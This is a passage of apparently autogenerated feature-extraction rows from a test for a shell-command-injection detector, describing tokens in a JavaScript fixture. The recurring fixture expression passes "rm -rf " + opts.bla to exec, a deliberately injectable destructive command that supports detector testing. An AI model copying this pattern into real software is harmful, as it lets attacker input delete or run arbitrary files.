opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:26 | opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:26 | opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:26 | opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:26 | opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:26 | opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:30 | opts.bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:30 | opts.bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:30 | opts.bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:30 | opts.bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:30 | opts.bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:23:277:30 | opts.bla | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:28:277:30 | bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:28:277:30 | bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:28:277:30 | bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:28:277:30 | bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:28:277:30 | bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:6 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:6 | this | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:6 | this | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:6 | this | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:6 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:11 | this.opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:11 | this.opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:11 | this.opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:11 | this.opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:11 | this.opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:16 | this.opts = {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:16 | this.opts = {} | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:16 | this.opts = {} | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:16 | this.opts = {} | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:3:278:16 | this.opts = {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:8:278:11 | opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:8:278:11 | opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:8:278:11 | opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:8:278:11 | opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:8:278:11 | opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:15:278:16 | {} | assignedToPropName | opts | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:15:278:16 | {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:15:278:16 | {} | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:15:278:16 | {} | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:15:278:16 | {} | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:278:15:278:16 | {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:6 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:6 | this | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:6 | this | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:6 | this | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:6 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:11 | this.opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:11 | this.opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:11 | this.opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:11 | this.opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:11 | this.opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:15 | this.opts.bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:15 | this.opts.bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:15 | this.opts.bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:15 | this.opts.bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:15 | this.opts.bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:26 | this.op ... pts.bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:26 | this.op ... pts.bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:26 | this.op ... pts.bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:26 | this.op ... pts.bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:3:279:26 | this.op ... pts.bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:8:279:11 | opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:8:279:11 | opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:8:279:11 | opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:8:279:11 | opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:8:279:11 | opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:13:279:15 | bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:13:279:15 | bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:13:279:15 | bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:13:279:15 | bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:13:279:15 | bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:22 | opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 